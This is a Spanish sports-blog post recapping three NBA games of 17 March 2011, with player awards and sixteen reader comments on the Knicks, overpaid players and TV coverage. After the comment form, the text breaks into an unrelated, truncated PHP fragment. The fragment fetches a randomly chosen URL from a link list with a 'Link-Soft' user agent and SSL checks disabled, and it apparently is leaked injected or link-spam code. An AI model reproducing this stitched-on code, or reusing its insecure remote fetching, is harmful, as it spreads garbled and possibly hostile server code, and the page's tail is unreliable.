La Crónica (17/03/2011)

18 de March de 2011 por txusma

Hoy acabaremos rápido la crónica y es que, como cada jueves, sólo se han disputado 3 partidos en la NBA y de ellos, tan solo el Memphis-Knicks parecía interesante a priori. Decimos a priori porque a la hora de la verdad los Grizzlies fueron acribillados desde la línea de 3 puntos y no pudieron presentar mucha batalla (99-120). Fue un día de récords en la franquicia de la Gran Manzana: Toney Douglas anotó 9 triples, igualando el mejor registro de un Knickbocker, y todo el conjunto de los Knicks se fue a los 20, récord también de la franquicia.

Mucho más desigualado fue el partido entre Cleveland y Portland. 41 puntos de diferencia en un encuentro infame de los ex compañeros de Lebron (70-111). Los Blazers aprovecharon el plácido enfrentamiento para dar descanso a sus mejores hombres y minutos a jugadores prácticamente inéditos.

Y por su parte, los Bulls suman y siguen, esta vez frente New Jersey, que ve como termina su buena racha de victorias (84-73). Los Nets notaron el horrible partido de Deron Williams en el tiro y en Chicago destacó Omer Asik, que se marcó su mejor encuentro desde que está en la NBA. Los Bulls llevan ya 8 victorias consecutivas.

PREMIOS

MVP: 9 triples de 12 intentos para un total de 29 puntos. A Toney Douglas el aro de los Grizzlies se le hizo del tamaño de una piscina.

Rookie: Pocos rookies saltaron a la cancha. El mejor, el turco Omer Asik, que hoy se lleva 2 premios.

Sorpresa: En 25 minutos, Omer Asik anotó 11 puntos y capturó 16 rebotes. Mientras Noah se encargaba de controlar a Kris Humphries, el turco se ponía las botas con el mayor de los Lopez.

Decepción: Deron Williams sólo fue capaz de anotar 1 de sus 12 lanzamientos a canasta. Se le debía caer la cara de vergüenza.

Esfuerzo en vano: En el mal partido de Deron Williams, Brook Lopez fue el mejor de su equipo con 22 puntos y 8 rebotes. No son los 16 de su compañero Humphries pero algo es algo.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Aunque hoy han ganado, los Knicks deberían intentar algo para que volviese Felton? Han bajado un peldaño desde el trade y Felton se me antoja clave.

      Citar

  2. MagicJohnson32 dice:
    #2

    Los Cavs: 6 asistencias, 18 pérdidas. Qué vergüenza.

      Citar

  3. GreenPride dice:
    #3

    Ayer vi Knicks-Grizzlies y Nets-Bulls.
    Los Bulls jugaron un partido más bien mediocre en ataque pero su gran defensa les sirvió para llevarse sin demasiados problemas el partido. Si siguen así de bien tienen muchas opciones de ser primeros del Este y evitar a Celtics y Heat hasta las finales de conferencia. Rose ganó la partida claramente a Deron que no tuvo su noche y Asik fue una gran ayuda en los tableros para los Bulls. Fin al sueño de 5 victorias seguidas de los Nets.
    En New York las metralletas de los Knicks tuvieron su noche en el tiro y así es muy complicado ganarles. Particularmente no les veo con defensa suficiente para plantar cara en playoffs aunque darán problemas a los Heat en primera ronda si todo sigue así.
    Lo de los Cavs sin comentarios, ellos ya terminaron su temporada hace tiempo.

      Citar

  4. scriers dice:
    #4

    A mí me da la sensación que los % de Rose son en tornos a 1/3 en sus tiros. 8/23, 9/25 lo he visto muchas veces, sin embargo el otro día leí que estaba al 0,44 y me sorprendió tela marinera.
    Y yo también creo que yéndose Felton ha perdido mucho New York, es más, el equipo ha pasado de caerme bien a carme regular.

      Citar

  5. Vader dice:
    #5

    Ufff ya era hora que los Knicks ganaran, desde que empece a sacar pecho en el foro han tenido una racha…

    En fin que este año como mucho podemos aspirar a dar algun susto en playoff. Sobretodo por lo imprevisible que es el equipo que si esta acertado en el tiro es muy difícil de ganar y porque en finales ajustados con gente como Billups y Melo es un equipo muy complicado. Hasta que el equipo no tenga más kilos y altura por dentro no podra aspirar a nada más.

    Yo tambien creo que el MVP este año debe ser para Rose y le sigue de cerca Howard que a mejorado mucho sus movimientos en la pintura.

    Saludos

      Citar

  6. miquel dice:
    #6

    gran partido de douglas,por cierto para vosotros cual es el peor jugador de la nba ,por promedios brian scalabrine

      Citar

  7. Txusma dice:
    #7

    Diría que todavía juega alguno de los gemelos Collins, no? Malísimos ambos.

      Citar

  8. MagicJohnson32 dice:
    #8

    Juegan ambos, o al menos forman parte de plantillas NBA, porque jugar, más bien poco. Jason ha sido titular varias veces este año en los Hawks y Jarron está en los Blazers. Lamentables ambos, sí.

      Citar

  9. Denise dice:
    #9

    El peor jugador de la NBA en relacion rendimiento/salario es sin duda Luke Walton y su contratazo de 36 millones de dolares por 6 años. Eso si que es una sanguijuela.

      Citar

  10. Hynreck dice:
    #10

    Denise, relación precio-rendimiento, no hay nadie que se acerque a Eddy Curry

      Citar

  11. MagicJohnson32 dice:
    #11

    Si te pones así mira el contrato de Haywood en los Mavs y el rendimiento que está dando. O la temporadita que se está marcando Andris Biedrins, con 9 kilos al año hasta 2014. O los 22 de Rashard, los 20 de Arenas, los 15 de Stojakovic, 12 de Dalembert…

      Citar

  12. CAMPO2 dice:
    #12

    Hay mucho canalla suelto, y algunos como se puede ver con muy buenos agentes

      Citar

  13. Denise dice:
    #13

    Yo es que Curry ya ni lo cuento como jugador…
    Pero los Lewis, Arenas, Stojakovic, Biedrins etcetera son gente con calidad que por su mala cabeza, la edad, o otros factores no rinden. Pero Walton nunca hizo nada para merecer ese salario. De todas formas tampoco quiero discutir ahora sobre ello,
    Por cierto, yo que siempre le pego palos al Marca, esta vez le felicito por emitir el programa Real NBA.
    Me ha gustado el programa, en especial la frase de Joe Smith en referencia a lo grande que son los Lakers y todo lo que le rodea.
    “Tenía 90 seguidores en Twitter, la primera vez que entré a mirar Twitter después de que me traspasaran a los Lakers ya tenía 5,000 seguidores.”

      Citar

  14. Txusma dice:
    #14

    El programa también lo emite igual en TV3 con otro nombre (el material se lo pasan directamente de EEUU). Cuanta más gente se interese por la NBA mejor para todos.

      Citar

  15. Denise dice:
    #15

    Ya sé que no es un programa hecho por ellos, es una especie de NBA en acción, pero al menos le dan una oportunidad a este deporte y lo ofrecen a una hora decente, al igual que el otro programa diario de baloncesto “Basket and Roll”,
    recuerdo que Cuatro trata, o mejor dicho, maltrata el baloncesto echando los partidos de los viernes casi siempre en diferido, y poniendo el programa “NBA en acción” un domingo a las 6 de la mañana…
    Quizás haya razones económicas o motivos por ahí que desconozco y que ellos solo sabrán, pero para un aficionado sería mejor que retransmitiesen en abierto los partidos de los domingos que suelen empezar a las 11- 12 de la noche e incluso antes..
    Ya sé que la NBA no tiene ni el tirón ni las audiencias del futbol, pero Cuatro no anda sobrado de audiencia precisamente. Vamos, que si echase la NBA en Prime Time o Late Night el domingo, tampoco iba a desentonar con el share medio de la cadena, e incluso, podrían aumentarlo si apuestan por ello como lo hicieron con la Formula 1.
    Como hay mucha gente que solo se interesa por un deporte si hay un españolito en liza…., si no se apuesta ahora por la NBA teniendo a Pau en Lakers, no se va a apostar nunca por ella ….
    PD: No soy catalán, no sabía que TV3 lo emitiese.

      Citar

  16. Pirata dice:
    #16

    De acuerdo con vosotros pero es que estamos en el pais del futbol, que mas podeis pedir, cuando quedo con mis amigos y rara vez hablamos de baloncesto a los unicos jugadores que conocen de la nba es a Pau y a Rudy, pero lo mas fuerte es que no conocen ni a los jugadores acb o euroleague, solo Messi o Cristiano, Barça o Madrid y punto. Nos tenemos de conformar con ser los freaks de la nba. A mi ya me vale.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>